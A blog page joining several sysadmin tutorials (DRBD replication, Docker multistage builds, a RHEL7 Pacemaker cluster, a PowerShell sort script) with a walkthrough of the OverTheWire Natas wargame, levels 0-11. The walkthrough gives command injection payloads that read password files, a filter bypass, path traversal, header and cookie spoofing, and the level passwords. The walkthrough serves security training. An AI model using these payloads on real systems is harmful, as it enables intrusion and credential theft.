DRBD(without clustering)

Do you need transparent, real-time replication of block devices without the need for specialty hardware without paying anything ?

If your answer is YES. DRBD is your solution. DRBD is a distributed replicated storage system for the Linux platform. It is implemented as a kernel driver, several userspace management applications, and some shell scripts. DRBD is traditionally used in high availability (HA)

In this post, I am going create HA cluster block storage. Switching-over will be handled manually. But in the next post I will add cluster software. I have two Debian systems for this lab. It is depicted in the Figure-1 sample architecture.

Figure-1 Sample HA Block Storage

Reference:https://www.ibm.com/developerworks/jp/linux/library/l-drbd/index.html

Installing DRDB packages:

Install drbd8-utils on each of the node.

root@debian1:~# apt-get install drbd8-utils 

Add hostnames into the /etc/hosts file on each of the node.

192.168.122.70 debian1
192.168.122.71 debian2

Creating a file system:

Instead of adding a disk storage we create a file and use it as a storage on each of the node.

root@debian1:~# mkdir /replicated
root@debian1:~# dd if=/dev/zero of=drbd.img bs=1024K count=512
root@debian2:~# mkdir /replicated
root@debian2:~# dd if=/dev/zero of=drbd.img bs=1024K count=512
root@debian1:~# losetup /dev/loop0 /root/drbd.img
root@debian2:~# losetup /dev/loop0 /root/drbd.img

Configuring DRBD:

Add the configuration below on each of the node.

root@debian1:~# cat /etc/drbd.d/replicated.res
resource replicated {
protocol C;          
on debian1 {
                device /dev/drbd0;
                disk /root/drbd.img;
                address 192.168.122.70:7788;
                meta-disk internal;
                }
on debian2 {
                device /dev/drbd0;
                disk /root/drbd.img;
                address 192.168.122.71:7788;
                meta-disk internal;
                }
               
} 


Initializing metadata storage(on each node)

root@debian1:~# drbdadm create-md replicated
initializing activity log
NOT initializing bitmap
Writing meta data...
New drbd meta data block successfully created.
root@debian1:~# 

Make sure that drbd service is running on both nodes.

● drbd.service - LSB: Control DRBD resources.
   Loaded: loaded (/etc/init.d/drbd; generated; vendor preset: enabled)
   Active: active (exited) since Fri 2019-02-01 15:32:34 +04; 6min ago
     Docs: man:systemd-sysv-generator(8)
  Process: 1399 ExecStop=/etc/init.d/drbd stop (code=exited, status=0/SUCCESS)
  Process: 1420 ExecStart=/etc/init.d/drbd start (code=exited, status=0/SUCCESS)
    Tasks: 0 (limit: 4915)
   CGroup: /system.slice/drbd.service

root@debian2:~# lsblk 
NAME              MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
loop0               7:0    0  512M  0 loop 
└─drbd0           147:0    0  512M  1 disk 
sr0                11:0    1 1024M  0 rom  
vda               254:0    0   10G  0 disk 
└─vda1            254:1    0   10G  0 part 
  ├─vgroot-lvroot 253:0    0  7.1G  0 lvm  /
  └─vgroot-lvswap 253:1    0  976M  0 lvm  [SWAP]

DRDB uses only one node at a time as a primary node where read and write can be preformed. We will at first specify node 1 as primary node.

root@debian1:~# drbdadm primary replicated --force

root@debian1:~# cat /proc/drbd 
version: 8.4.7 (api:1/proto:86-101)
srcversion: AC50E9301653907249B740E
0: cs:SyncSource ro:Primary/Secondary ds:UpToDate/Inconsistent C r-----
ns:516616 nr:0 dw:0 dr:516616 al:8 bm:0 lo:0 pe:0 ua:0 ap:0 ep:1 wo:f oos:7620
[==================>.] sync'ed: 99.3% (7620/524236)K
finish: 0:00:00 speed: 20,968 (13,960) K/sec
root@debian1:~# cat /proc/drbd
version: 8.4.7 (api:1/proto:86-101)
srcversion: AC50E9301653907249B740E
0: cs:SyncSource ro:Primary/Secondary ds:UpToDate/Inconsistent C r-----
ns:524236 nr:0 dw:0 dr:524236 al:8 bm:0 lo:0 pe:0 ua:0 ap:0 ep:1 wo:f oos:0
[===================>] sync'ed:100.0% (0/524236)K
finish: 0:00:00 speed: 20,300 (13,792) K/sec

Initializing the Filesystem:

root@debian1:~# mkfs.ext4 /dev/drbd0 
root@debian1:~# mount /dev/drbd0 /replicated/

Do not forget to format the disk partition(in this case /dev/drbd0) first node only. Do not issue the command(mkfs.ext4) on the second node again.

Switching-over the Second node

#On first node:
root@debian1:~# umount /replicated
root@debian1:~# drbdadm secondary replicated
#On second node:
root@debian2:~# drbdadm primary replicated
root@debian2:~# mount /dev/drbd0

Switching-back the First Node:

#On second node:
root@debian2:~# umount /replicated
root@debian2:~# drbdadm secondary replicated
#On first node:
root@debian1:~# drbdadm primary replicated
root@debian1:~# mount /dev/drbd0


Checking Connection without Telnet

Some of the minimal Linux distributions have no telnet client utility or similar utilities such as nc,ncat unless you install it. Most of time we need to do troubleshooting to check connection if  server/service is accessible. Do not worry–You still have mechanism inside the Linux kernel without installing above utilities. Take a look at below examples and change it accordingly for your case.

Checking TCP connection:

root@debian2:# echo > /dev/tcp/8.8.8.8/53 && echo "PORT IS OPEN" || echo "PORT IS NOT OPEN"
PORT IS OPEN
root@debian2:~# echo > /dev/tcp/google.com/80 && echo "PORT IS OPEN" || echo "PORT IS NOT OPEN"
PORT IS OPEN
root@debian2:~# echo > /dev/tcp/google.com/443 && echo "PORT IS OPEN" || echo "PORT IS NOT OPEN"
PORT IS OPEN
#I have to send signal SIGINT.
root@debian2:~# echo > /dev/tcp/google.com/123 && echo "PORT IS OPEN" || echo "PORT IS NOT OPEN"
^C-su: connect: Network is unreachable


Checking UDP Connection:

root@debian2:~# echo > /dev/udp/0.pool.ntp.org/123 && echo "PORT IS OPEN" || echo "PORT IS NOT OPEN"
PORT IS OPEN

 

 

Minimizing Docker Images with Multistage

When you build your own  docker image from Dockerfile,  each instruction in Dockerfile creates a new layer to your base image with its all dependencies so that even your very tiny application image size may be in 1GiB  size and it is not desirable in the production environment to be such a big size due to the below reasons.

  • Large Images takes longer to Download
  • Large Images takes up more disk space
  • Large Images contains unnecessary components

 

How to Reduce Image Size ?

Answer is multi-stage build. Multi-Stage builds enables you to create smaller container images with better caching and smaller security footprint. In this post, It will be shown you how to minimize your docker image step by step. For this experiment, It is written very simple Go web application.

Let’s create a web application named main.go

package main

import (
    "fmt"
    "log"
    "net/http"
)

func handler(w http.ResponseWriter, r *http.Request) {
    fmt.Fprintf(w, "Hi there, I love %s!", r.URL.Path[1:])
    log.Printf("connection from:%s",r.RemoteAddr)
}

func main() {
    http.HandleFunc("/", handler)
    log.Fatal(http.ListenAndServe(":8080", nil))
}

Creating a Dockerfile.

FROM  golang:alpine AS builder
WORKDIR /webapps/app
ADD . /webapps/app
RUN go build -o main .
EXPOSE 8080
CMD ["/webapps/app/main"]

Building docker image

tesla@otuken:~/DockerTraining/SimpleHello$ sudo docker build -t gokay/goweb:1 .

 

Figure-1 Image Size 317MB

As you see in the Figure-1 image size that simple application is 317MB.

Multi-Stage Build:

In this section, it will be shown you how to reduce the docker image size with Multi-Stage build. Only thing we need to do is adding some lines in our Dockerfile.

FROM  golang:alpine AS builder
WORKDIR /webapps/app
ADD . /webapps/app
RUN go build -o main .


FROM alpine
WORKDIR /app
ADD . /app
COPY --from=builder /webapps/app/main /app
EXPOSE 8080
CMD ["/app/main"]

 

tesla@otuken:~/DockerTraining/SimpleHello$ sudo docker build -t gokay/goweb:1 .

After building our new image with new Dockerfile image size considerably reduced.

Figure-2 Image size 11MB

As you see docker image size is now 11MB.

If this size enough for you you can skip reading rest of the post. We can even reduce the image size a bit more as we write our application in Go. We can disable the cross-compilation as below.

 

FROM  golang:alpine AS builder
WORKDIR /webapps/app
ADD . /webapps/app
RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -ldflags '-extldflags "-static"' -o main .

FROM alpine
WORKDIR /app
ADD . /app
COPY --from=builder /webapps/app/main /app
EXPOSE 8080
CMD ["/app/main"]

 

Figure-3 Image size 10.9 MB

Reducing More ?

You can use scratch image which is the minimalist image. But I would recommend to use alphine as it the security-oriented Linux distribution.

FROM  golang:alpine AS builder
WORKDIR /webapps/app
ADD . /webapps/app
#RUN go build -o main .
RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -ldflags '-extldflags "-static"' -o main .
#EXPOSE 8080
#CMD ["/webapps/app/main"]


FROM scratch
WORKDIR /app
ADD . /app
COPY --from=builder /webapps/app/main /app
EXPOSE 8080
CMD ["/app/main"]

 

tesla@otuken:~/DockerTraining/SimpleHello$ sudo docker build -t gokay/goweb:1 .

 

 

 

 

 

Building RHEL7 Cluster Part-I

Hello Folks,

It has been long time, I could not create any post about the clustering with RHEL7. It uses Pacemaker as a high-availability cluster resource manager.

In this post, It will be used two-node cluster. Each of the node has been configured to resolve the hostnames into the IP addresses. Also, each node has been configured the sync its time from the outside world ntp servers. It is depicted in the Figure-1.

Nodes:

pck1 – 192.168.122.22

pck2- 192.168.122.23

It is used ntpd deamon, instead of chronyd.

Figure-1 Two-Node Cluster with Pacemaker

 

Installing Necessary Packages:

On both nodes;

[root@pcmk-1 ~]# yum update -y
[root@pcmk-1 ~]# yum install -y pacemaker pcs psmisc policycoreutils-python

Configuring Firewall:

On both nodes;

[root@pcmk-1 ~]# firewall-cmd --permanent --add-service=high-availability
[root@pcmk-1 ~]# firewall-cmd --reload

Disabling Selinux:

On both nodes;

[root@pcmk-1 ~]# setenforce 0
[root@pcmk-1 ~]# sed -i.bak "s/SELINUX=enforcing/SELINUX=permissive/g" /etc/selinux/config

Staring and Enabling Cluster Service:

On either node.

root@pck1 ~]# systemctl enable pcsd.service 
Created symlink from /etc/systemd/system/multi-user.target.wants/pcsd.service to /usr/lib/systemd/system/pcsd.service.
[root@pck1 ~]# systemctl start pcsd.service 

Configuring Cluster:

On both node set password for the user hacluster

root@pck1 ~]# passwd hacluster

On either node authenticate the nodes.

[root@pck1 ~]# pcs cluster auth pck1 pck2
Username: hacluster
Password: 
pck2: Authorized
pck1: Authorized

Named the Cluster:

I named cluster as LATAM_GW

[root@pck1 ~]# pcs cluster setup LATAM_GW pck1 pck2
Error: A cluster name (--name <name>) is required to setup a cluster
[root@pck1 ~]# pcs cluster setup --name LATAM_GW pck1 pck2
Destroying cluster on nodes: pck1, pck2...
pck1: Stopping Cluster (pacemaker)...
pck2: Stopping Cluster (pacemaker)...
pck2: Successfully destroyed cluster
pck1: Successfully destroyed cluster

Sending 'pacemaker_remote authkey' to 'pck1', 'pck2'
pck1: successful distribution of the file 'pacemaker_remote authkey'
pck2: successful distribution of the file 'pacemaker_remote authkey'
Sending cluster config files to the nodes...
pck1: Succeeded
pck2: Succeeded

Synchronizing pcsd certificates on nodes pck1, pck2...
pck2: Success
pck1: Success
Restarting pcsd on the nodes in order to reload the certificates...
pck2: Success
pck1: Success
[root@pck1 ~]#

Starting Cluster

On either node.

[root@pck1 ~]# pcs cluster start --all
pck1: Starting Cluster...
pck2: Starting Cluster...

You can also start the specific node instead of all nodes in the cluster.

[root@pck1 ~]# pcs cluster start pck1
pck1: Starting Cluster...

Viewing the version of cluster software:

[root@pck1 ~]# pacemakerd --features
Pacemaker 1.1.18-11.el7_5.3 (Build: 2b07d5c5a9)
 Supporting v3.0.14:  generated-manpages agent-manpages ncurses libqb-logging libqb-ipc systemd nagios  corosync-native atomic-attrd acls
[root@pck1 ~]# 

Checking current cluster Configuration:

Cluster configuration stored in XML format. You can view the current cluster configuration with “pcs cluster cib”.

[root@pck2 ~]# pcs cluster cib 
<cib crm_feature_set="3.0.14" validate-with="pacemaker-2.10" epoch="5" num_updates="4" admin_epoch="0" cib-last-written="Sat Dec  1 14:55:56 2018" update-origin="pck2" update-client="crmd" update-user="hacluster" have-quorum="1" dc-uuid="2">
  <configuration>
    <crm_config>
      <cluster_property_set id="cib-bootstrap-options">
        <nvpair id="cib-bootstrap-options-have-watchdog" name="have-watchdog" value="false"/>
        <nvpair id="cib-bootstrap-options-dc-version" name="dc-version" value="1.1.18-11.el7_5.3-2b07d5c5a9"/>
        <nvpair id="cib-bootstrap-options-cluster-infrastructure" name="cluster-infrastructure" value="corosync"/>
        <nvpair id="cib-bootstrap-options-cluster-name" name="cluster-name" value="LATAM_GW"/>
      </cluster_property_set>
    </crm_config>
    <nodes>
      <node id="1" uname="pck1"/>
      <node id="2" uname="pck2"/>
    </nodes>
    <resources/>
    <constraints/>
  </configuration>
  <status>
    <node_state id="1" uname="pck1" in_ccm="true" crmd="online" crm-debug-origin="do_state_transition" join="member" expected="member">
      <lrm id="1">
        <lrm_resources/>
      </lrm>
    </node_state>
    <node_state id="2" uname="pck2" in_ccm="true" crmd="online" crm-debug-origin="do_state_transition" join="member" expected="member">
      <lrm id="2">
        <lrm_resources/>
      </lrm>
    </node_state>
  </status>
</cib>

Adding Resource to Cluster:

In this post, It will be built High Available(Active-Passive) Apache Web Server. For this purpose first resource that we need to create is the ClusterIP. In other words Floating IP. A floating IP address is used to support failover in a high-availability cluster. The cluster is configured such that only the active member of the cluster “owns” or responds to that IP address at any given time.

On either node.

[root@pck1 ~]# pcs resource create ClusterIP ocf:heartbeat:IPaddr2 \
    ip=192.168.122.24 cidr_netmask=32 op monitor interval=30s

Configuring Apache for the Active-Passive cluster(HA)

On both nodes. Install httpd and wget on both nodes. wget is necessary tool which used by the resource agent to check the healthiness of the node.

[root@pck1 ~]# yum install -y httpd wget

Create a webpage on both nodes like below.

On first node:

Create index.html in the /var/www/html

 <html>
 <body>LATAMWEBGW running on - pck1.localdomain</body>
 </html>

On second node.

Create index.html in the /var/www/html

<html>
 <body>LATAMWEBGW running on - pck2.localdomain</body>
 </html>

Configure apache for server-status:

This pages will be requested by the cluster resource agent to check the healthiness of nodes.

On first node; create configuration into the /etc/httpd/conf.d/status.conf

<Location /server-status>
    SetHandler server-status
    Require all denied
    Require ip 127.0.0.1
    Require ip ::1
    Require ip 192.168.122.22
</Location>

On second node; create configuration into the /etc/httpd/conf.d/status.conf

<Location /server-status>
    SetHandler server-status
    Require all denied
    Require ip 127.0.0.1
    Require ip ::1
    Require ip 192.168.122.23
</Location>

Creating Resource for the Apache

Only either one.

pcs resource create LATAMWEBGW ocf:heartbeat:apache  \
      configfile=/etc/httpd/conf/httpd.conf \
      statusurl="http://localhost/server-status" \
      op monitor interval=1min

As you may now, we have two resources now. One is the ClusterIP and the other one is LATAMWEBGW. If you do not do anything special, Cluster Manager load balances these to resources by running on the different nodes, that we do not want that. So, these two resources are dependent on each other. We need to add some constraints solve this problem.

Creating colocation constraint:

Colocation constraint tells the cluster manager that location of one resource is depended location of another resource.

On either node

pcs constraint colocation add LATAMWEBGW with ClusterIP INFINITY

By issuing the command above; we told cluster manager that LATAMWEBGW resource must be in the same node as ClusterIP resource.

Latest status of our cluster:

[root@pck1 conf.d]# pcs status
Cluster name: LATAM_GW
Stack: corosync
Current DC: pck1 (version 1.1.18-11.el7_5.3-2b07d5c5a9) - partition with quorum
Last updated: Sun Dec  2 13:43:46 2018
Last change: Sun Dec  2 13:43:42 2018 by root via cibadmin on pck1

2 nodes configured
3 resources configured

Online: [ pck1 pck2 ]

Full list of resources:

 virsh-fencing	(stonith:fence_virsh):	Stopped
 ClusterIP	(ocf::heartbeat:IPaddr2):	Started pck1
 LATAMWEBGW	(ocf::heartbeat:apache):	Started pck1

Creating Order Constraint:

We may have still an issue when sending a request to the our Web Server. Other than, colocation constraint, we also need to tell the cluster software to order of the resources to be started. It is called order constraint.

[root@pck1 conf.d]# pcs constraint order ClusterIP then LATAMWEBGW
Adding ClusterIP LATAMWEBGW (kind: Mandatory) (Options: first-action=start then-action=start)
[root@pck1 conf.d]#

By issuing the command above we are telling the cluster manager to which resource to be started first. After we configured constraints, we can test our Web Server if it handles the requests properly.

tesla@otuken:~$ curl http://latamwebgw
 <html>
 <body>My Test Site - pck1.localdomain</body>
 </html>

Relocating the Resource to Another Node:

Sometimes we need to relocate the resources to the other node in order to maintain or upkeep of the nodes.

[root@pck2 ~]# pcs status
Cluster name: LATAM_GW
Stack: corosync
Current DC: pck1 (version 1.1.18-11.el7_5.3-2b07d5c5a9) - partition with quorum
Last updated: Wed Dec  5 23:26:49 2018
Last change: Mon Dec  3 09:27:47 2018 by root via crm_resource on pck1

2 nodes configured
3 resources configured

Online: [ pck1 pck2 ]

Full list of resources:

 virsh-fencing	(stonith:fence_virsh):	Stopped
 ClusterIP	(ocf::heartbeat:IPaddr2):	Started pck1
 LATAMWEBGW	(ocf::heartbeat:apache):	Started pck1

Failed Actions:
* virsh-fencing_start_0 on pck1 'unknown error' (1): call=14, status=Error, exitreason='',
    last-rc-change='Wed Dec  5 21:26:32 2018', queued=0ms, exec=1404ms
* virsh-fencing_start_0 on pck2 'unknown error' (1): call=14, status=Error, exitreason='',
    last-rc-change='Wed Dec  5 21:26:36 2018', queued=0ms, exec=1398ms


Daemon Status:
  corosync: active/disabled
  pacemaker: active/disabled
  pcsd: active/enabled

As you may see current resources running on pck1, which is the first node. Let’s relocate it to the pck2 which is the second node.

[root@pck2 ~]# pcs resource move LATAMWEBGW pck2
[root@pck2 ~]# pcs status
Cluster name: LATAM_GW
Stack: corosync
Current DC: pck1 (version 1.1.18-11.el7_5.3-2b07d5c5a9) - partition with quorum
Last updated: Wed Dec  5 23:34:10 2018
Last change: Wed Dec  5 23:33:42 2018 by root via crm_resource on pck2

2 nodes configured
3 resources configured

Online: [ pck1 pck2 ]

Full list of resources:

 virsh-fencing	(stonith:fence_virsh):	Stopped
 ClusterIP	(ocf::heartbeat:IPaddr2):	Started pck2
 LATAMWEBGW	(ocf::heartbeat:apache):	Started pck2

As you see all LATAMWEBGW resource is now running on pck2 which is the second node.

tesla@otuken:~$ curl http://latamwebgw
 <html>
 <body>My Test Site - pck2.localdomain</body>
 </html>

 

This is the end of  first part of the RHEL7 clustering part. We have not yet configured fencing, which is very crucial part of the clustering. In the next post we are going to configure fencing, stickiness and other cluster settings.

Happy Clustering 🙂

Sorting by Specific Column in PowerShell

Hello Folks,

I needed a script in Poweshell which sorts the data by specific column. I wanted to share it on my blog as I do not see much examples over the Internet.

Let’s say you have data as below and you want to sort this data by specific column. In this example I sort the data by

Elapsed Time.

Fields are in the sample data delimited by multiple space–in Regex terms (\s+)

Fields are; Batch Name Status Stage Batch Batch Date Start Time End Time Elapsed Time Avg. Elapsed Time

BNK/TEST001 0 A100-Application 20140325 20:01:38 20:01:38 0 0.2
BNK/TEST002 0 R050-Reporting 20140325 21:23:50 21:23:51 1 0.3
BNK/TEST003 0 D110-Start-of-Day 20140325 00:17:34 00:17:34 0 0.9
BNK/TEST004 0 D110-Start-of-Day 20140325 00:17:33 00:17:33 0 0.5
BNK/TEST005 0 S920-System-Wide 20140325 21:09:41 21:09:41 0 0.0
BNK/TEST006 0 S920-System-Wide 20140325 21:18:46 21:18:47 1 0.4
BNK/TEST007 0 S920-System-Wide 20140325 21:18:48 21:18:48 1 0.7
BNK/TEST008 0 S920-System-Wide 20140325 21:18:48 21:18:48 0 0.0
BNK/TEST009 0 S920-System-Wide 20140325 21:18:48 21:18:48 0 0.1
BNK/TEST010 0 S920-System-Wide 20140325 21:10:38 21:18:46 544 508.3

 

Sorting Script

Get-Content sample_data.txt | ForEach-Object {
 $Line = $_.Trim() -Split '\s+'
 New-Object -TypeName PSCustomObject -Property @{
                batchName = $Line[0]
                #status = $Line[1]
                stage = $Line[2]
                batchDate = $Line[3]
                startTime = $Line[4]
                endTime = $Line[5]
                elapsedTime = [double]$Line[6]
                avgElapsedtime = [double]$Line[7]
  }

} | Sort-Object elapsedTime -Descending | Format-Table -Property batchName,stage,batchDate,startTime,endTime,elapsedTime  -AutoSize | Out-String -Width 4096 | Out-file results.txt -Encoding default

 

Results

batchName   stage             batchDate startTime endTime  elapsedTime
---------   -----             --------- --------- -------  -----------
BNK/TEST010 S920-System-Wide  20140325  21:10:38  21:18:46         544
BNK/TEST007 S920-System-Wide  20140325  21:18:48  21:18:48           1
BNK/TEST006 S920-System-Wide  20140325  21:18:46  21:18:47           1
BNK/TEST002 R050-Reporting    20140325  21:23:50  21:23:51           1
BNK/TEST009 S920-System-Wide  20140325  21:18:48  21:18:48           0
BNK/TEST001 A100-Application  20140325  20:01:38  20:01:38           0
BNK/TEST008 S920-System-Wide  20140325  21:18:48  21:18:48           0
BNK/TEST003 D110-Start-of-Day 20140325  00:17:34  00:17:34           0
BNK/TEST004 D110-Start-of-Day 20140325  00:17:33  00:17:33           0
BNK/TEST005 S920-System-Wide  20140325  21:09:41  21:09:41           0

 

Happy Scripting 🙂

 

Solutions of NATAS 1-15

Hello Folks,

In this post, I will share with you the solutions of Natas challenges from one to fifteen. It is strongly recommended not to look at the solutions without cogitating.

Natas0:

Username and password have been already provided for Natas0.

URL: http://natas0.natas.labs.overthewire.org

natas0/natas0

Solution:

Login the page with the credential natas0/natas0.

On Chrome Browser right-click and “View page source”

Password for natas1 is : gtVrDuiDfck831PqWsLEZy5gyDz1clto

Natas1:

URL: http://natas1.natas.labs.overthewire.org/

Solution:

Login the page with the credential that you got from the natas0.

In this challenge you can not do right-clicking, instead you should use F12 shortcut function key to open Web developer tools. And the select Elements tab.

Password for natas2 is : ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

 

Natas2:

URL: http://natas2.natas.labs.overthewire.org

Solution:

Login the page with the credential that you got from the natas1.

On Chrome Browser right-click and “View page source”

Actually it is not obvious, but we have a hint from the tag <img src=”files/pixel.png”>

<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

Let’s make a request for the URL http://natas2.natas.labs.overthewire.org/files/

You can see the file users.txt, which holds the number of users’ credentials.

Password for natas3 is : sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Natas3:

URL: http://natas3.natas.labs.overthewire.org

For this challenge, we should have basic understanding of robots.txt which is a Robots Exclusion Protocol, which indicates whether certain user agents (web-crawling software) can or cannot crawl parts of a website. These crawl instructions are specified by “disallowing” or “allowing” the behavior of certain (or all) user agents. For more information here.

Solution:

Login the page with the credential that you got from the natas2 and “View Page Source” on Google Chrome.

 

Let’s make request to URL http://natas3.natas.labs.overthewire.org/robots.txt

As it indicated in the introduction which tells the all user agents(all crawlers) not to access and index contents of the folder s3cr3t. If we make another request for the URL http://natas3.natas.labs.overthewire.org/s3cr3t/ you will see users.txt

Password for natas4 is: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Natas4:

URL: http://natas4.natas.labs.overthewire.org

To solve this challenge you need to have basic understanding of  de-facto HTTP request headers. For this challenge, our solution is Referer header.

Solution:

Referer is an HTTP header field that identifies the address of the webpage (i.e. the URI or IRI) that linked to the resource being requested. By checking the referrer, the new webpage can see where the request originated.(Wikipedia)

curl -v -H "Referer: http://natas5.natas.labs.overthewire.org/"  -u  natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org

Password for natas5 is : iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Natas5:

URL: http://natas5.natas.labs.overthewire.org

When we send a web request to web server via curl, Web server sends  a Set-Cookie header to the user agent. And with every request user agent will send back all previously stored cookies to the server with Cookie: header.

curl -v -u "natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" http://natas5.natas.labs.overthewire.org/
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
*   Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:09:16 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=0
< Vary: Accept-Encoding
< Content-Length: 855
< Content-Type: text/html; charset=UTF-8
< 

Solution:

There is no clear answer of this challenge. I just guessed it and modify the Cookie by setting the Cookie: loggedin=1

curl -v -H "Cookie: loggedin=1" -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq "http://natas5.natas.labs.overthewire.org"
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
*   Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> Cookie: loggedin=1
> 
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:11:43 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=1
< Vary: Accept-Encoding
< Content-Length: 890
< Content-Type: text/html; charset=UTF-8
< 
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
<strong>Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</strong></div>
</body>
</html>
* Connection #0 to host natas5.natas.labs.overthewire.org left intact

Password for the natas6 is : aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Natas6:

URL: http://natas6.natas.labs.overthewire.org

When we check the source code. It compares the value of the $secret with the value of the input element. If both values are equal, password for natas7 will be printed.

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

Solution: 

The include statement includes and evaluates the specified file.(php Manual).  Let’s try to access the include/secret.inc file by making a web request. URL http://natas6.natas.labs.overthewire.org/includes/secret.inc

As you see value of $secret variable is FOEIUWGHFEEUHOFUOIU. if you put this value to input form and submit the form.

 

 

Password for natas7 is: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Natas7:

URL: http://natas7.natas.labs.overthewire.org

Solution:

Web pages are rendered by the value of $_REQUEST[‘page’]. As an example . http://natas7.natas.labs.overthewire.org/index.php?page=about (To render about page.)

What if we set the page value to/etc/natas_webpass/natas8 ? So our URL will be http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

 

 

 

Password for natas8 is: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Natas8:

URL: http://natas8.natas.labs.overthewire.org

We need to simple reverse engineering to solve this challenge. Key thing is the function encodeSecret()

We must put a value into the input form that function yields us the value 3d3d516343746d4d6d6c315669563362

 

Solution:

You can use the URL https://repl.it/repls/SoftElegantPublishers  for your php sandbox.

<?php

echo base64_decode((strrev(hex2bin("3d3d516343746d4d6d6c315669563362"))));

//oubWYf2kBq
?>

 

If you put the value oubWYf2kBq into the input secret you will get the password for natas9.

 

Password for natas9 is: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Natas9:

URL: http://natas9.natas.labs.overthewire.org

Solution:

Running multiple commands by separating semicolon(;).

ls;cat /etc/natas_webpass/natas10

Password for natas10 is: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Natas10:

URL: http://natas10.natas.labs.overthewire.org

Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
</pre>

Solution: 

If you check the snipped of code above some of the special characters checked by the preg_match() php funtion. We need to bypass this check somehow.

Solution1: .* cat /etc/natas_webpass/natas11

Solution2: Using the URL Encoding code to escaping the preg_match() function.

http://natas10.natas.labs.overthewire.org/index.php?needle=pass%0A%20cat%20/etc/natas_webpass/natas11&submit=Search

.htaccess:AuthType Basic
.htaccess: AuthName "Authentication required"
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid-user
.htpasswd:natas10:$1$XOXwo/z0$K/6kBzbw4cQ5exEWpW5OV0
.htpasswd:natas10:$1$mRklUuvs$D4FovAtQ6y2mb5vXLAy.P/
.htpasswd:natas10:$1$SpbdWYWN$qM554rKY7WrlXF5P6ErYN/
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Password for natas11 is: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Natas11:

URL: http://natas11.natas.labs.overthewire.org/

<?

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
